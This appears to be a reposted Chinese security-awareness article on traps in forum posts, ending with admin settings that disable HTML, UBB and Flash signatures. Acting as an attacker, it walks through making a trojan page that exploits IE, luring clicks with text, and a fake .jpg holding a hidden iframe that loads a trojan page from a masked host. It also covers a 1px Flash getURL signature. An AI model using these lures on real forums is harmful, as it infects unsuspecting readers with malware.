「挖」出論壇帖子中暗藏的陷阱

[psac]

小李平時很喜歡泡論壇，這天他到自己常去的一個論壇回帖之後，電腦莫名其妙地重啟，重新開機之後感覺系統變得很慢。莫非帖子中暗藏機關？小李更新殺毒軟體的
病毒
庫後一查，果然自己的系統中了
木馬
……
　　論壇往往是一個網站中人氣最旺的地方，但很少有人注意到論壇給瀏覽者帶來的安全問題，而像小李這樣的遭遇卻是真實存在的！下面我們就為大家「挖」出論壇帖子中暗藏的害人陷阱。



　　瀏覽帖子有隱憂
　　現在很多論壇程序在開發時，會增加一些延伸功能，例如：可以在帖子中引用UBB標籤，可以在帖子中隱藏網頁真實位址，可以在個人簽名中加入特殊效果等。



　　這些功能雖然方便了瀏覽者，但同時也帶來很多安全隱患。惡意攻擊者可能借助這些功能，使用網頁木馬等攻擊瀏覽者的系統。我們在這裡模擬攻擊者，為大家揭露這些攻擊手法。
　　製造「陷阱」
　　選項任一功能稍微強大的論壇（例如動網，它在國內非常流行，而且所帶的延伸功能非常多）下手。



　　先利用網頁木馬產生器製作木馬網頁，它利用的是IE瀏覽器
漏洞
。開啟網頁木馬產生器，按下 「選項」按鈕，然後選項木馬程序mm.exe，產生2個文件：mm.chm和mm.html（圖1）。將這兩個文件以及木馬程序mm.exe上傳到網站空間中，就可以得到一個木馬網頁，位址以mm.html結尾，例如：
http://www.***.com/mm.html）。



圖1 利用網頁木馬產生器產生木馬網頁

　　接下來就是利用論壇的一些延伸功能暗布「陷阱」，使瀏覽者在無意間開啟帖子時中招。
　　使用陷阱
　　1.陷阱一：文字誘騙
　　通過帖子中的文字誘騙你按下木馬網頁連接，這是論壇帖子中最一般的「陷阱」。



　　攻擊者進入準備下手的論壇，申請帳號，然後到其中任一版塊發表帖子。帖子內容一般是帶有誘惑性的訊息：
　　這裡有最新最熱的遊戲資料和demo下載，趕快進來吧！
輸入完畢之後，發表帖子。



　　小提示：這裡發表帖子使用的「」標籤是動網論壇的內裝標籤，可以起到連接的作用，其他論壇也有使用此標籤的。
　　
　　當你瀏覽這個帖子時，會發現帖子中只顯示了文本內容：

　　這裡有最新最熱的遊戲資料和demo下載，趕快進來吧！
　　一般不清楚的人都會好奇地開啟檢視，從而開啟了木馬網頁http://www.***.com/mm.html，使自己的系統被種植了木馬。


　　其實只要把滑鼠游標放到文字上，就會在IE瀏覽器的左下角顯示這個連接的真實位址http://www.***.com/mm.html（圖2）。
　　 碰到這樣的帖子，可得多個心眼

　　如果你遇到了這樣富有誘惑力的帖子，千萬不要貿然地開啟檢視，因為裡面可能隱藏的就是木馬網頁。


.陷阱二：圖片誘騙
　　在帖子中顯示一張很大的圖片，你為了觀看全貌，就對圖片進行點擊，選項在新視窗中開啟檢視。這樣就會開啟木馬
網頁，而你看到的仍然是圖片。


　　攻擊者首先準備一張超寬的圖片（超過帖子頁面限制），命名為「022.jpg」（此處檔案名「022.jpg」中的「0」是阿拉伯數位），將其上傳到網站空間得到位址：http://www.***.com/022.jpg，再將以下程式碼儲存在記事本中：
　　＜img aligh=middle src="022.jpg"＞＜iframe src="http://www.***.com/mm.html" name="zhu" width="0" height="0" frameborder="0"＞＜br＞
　　儲存檔案名為：O22.jpg（此處檔案名「O22.jpg」中的「O」是大寫字母）。


　　將含有程式碼的O22.jpg文件上傳到網站空間圖片文件022.jpg的同一路徑下，得到位址：http://www.***.com/O22.jpg，這樣就得到了一個圖片木馬的位址。




　　小提示：雖然將htm文件的後面名改為jpg，但是在開啟的時候，瀏覽器仍然會以網頁的形式開啟，這樣就執行了其中的程式碼，而其中的程式碼則是連接到木馬網頁位址http://www.***.com/mm.html，從而使你的系統中木馬。
進入論壇，在帖子中輸入如下程式碼：
　　
這行程式碼的含義是使帖子中顯示一張圖片，圖片為http://www.***.com/022.jpg，而其連接到的位址是http://www.***.com/O22.jpg（木馬網頁的位址）。
　　 這段程式碼中暗藏玄機

　　 這樣帖子顯示的是一幅圖片022.jpg，由於圖片022.jpg非常寬，所以帖子中只顯示了部分圖片，而你為了看到圖片的全貌，必然點擊圖片，想在新視窗中開啟圖片，這樣就開啟了木馬網頁http://www.***.com/O22.jpg。雖然後台開啟了木馬網頁，但是圖片仍然正常顯示，因為O22.jpg中包含了一句程式碼：＜img aligh=middle src="022.jpg"＞，即表面上仍然顯示022.jpg圖片文件。


3.陷阱三：動畫簽名誘騙
　　個人簽名是論壇的特色，如果論壇在預設情況下允許使用Flash動畫作為論壇簽名，攻擊者完全可以構造一個存在惡意功能的Flash動畫作為論壇簽名，從而實現
木馬
網頁的大面積傳播。下面就為大家揭示這種攻擊手法。


　　Flash MX有一個功能叫「get url」，它能夠在你欣賞Flash動畫時自動跳轉到「get url」中設定的URL位址，從而開啟新的網站位址。攻擊者完全可以利用「get url」功能製作Flash動畫，使你在訪問時自動跳轉到一些惡意網頁（例如木馬網頁）。



　　首先，開啟Flash MX，按下工作列中的「修改」，開啟「修改我的文件內容」面板，設定Flash的尺寸，將其寬和高都設為1px，其餘的選項保持不變。


之所以將寬和高都設為1px，是因為px值越小，Flash動畫下載得越快。


　　其次，在動畫我的文件下方的「動作」欄進行設定，先選項「actions」，然後選項其中的「getURL」動作，雙按它，出現設定該動作的面板（圖4）。


在其中的URL項目中填寫要跳轉的位址，視窗選項「_blank」（開啟一個新視窗顯示URL）。


　　最後，在「getURL」中填寫一些惡性網站的位址，例如木馬網頁位址http://www.***.com/mm.html。
　　 產生惡意Falsh動畫

　　設定好之後，按下工作列的「文件」→「輸出」，產生動畫，然後將這個動畫上傳到網站空間中，得到位址：http://www.***.com/test.swf。


　　步驟3：進入論壇修改註冊帳號的個人簽名，加入以下程式碼：
******* http://www.***.com/test.swf********
　　提交修改資料，就獲得了一個惡意的論壇Falsh簽名。你一旦開啟帶有這種簽名的帖子，惡意Flash文件就會悄悄執行，並開啟木馬網頁，使你的系統在毫無察覺的情況下中木馬。
　 產生惡意論壇簽名

　　論壇的延伸功能造成的「陷阱」就為大家介紹到這裡，大家在瀏覽帖子的時候需要加倍小心。


　　編後：如果你是一個論壇的管理員，當看到惡意攻擊者在你的論壇發佈惡意帖子，應該怎麼辦呢？以動網論壇為例，進入論壇的管理後台，依次進入「論壇管理」→「管理」→「進階設定」中，將「帖子相關設定」中的HTML程式碼解析，UBB程式碼解析等功能關閉掉（圖6）。


再進去入「論壇一般設定」中，將「用戶選項」中的用戶簽名是否開啟UBB程式碼，用戶是否開啟Flash標籤等功能關閉，這樣就杜絕了攻擊者利用這種誘騙的手法來到論壇搗亂。

[lew]

謝謝大大提供！！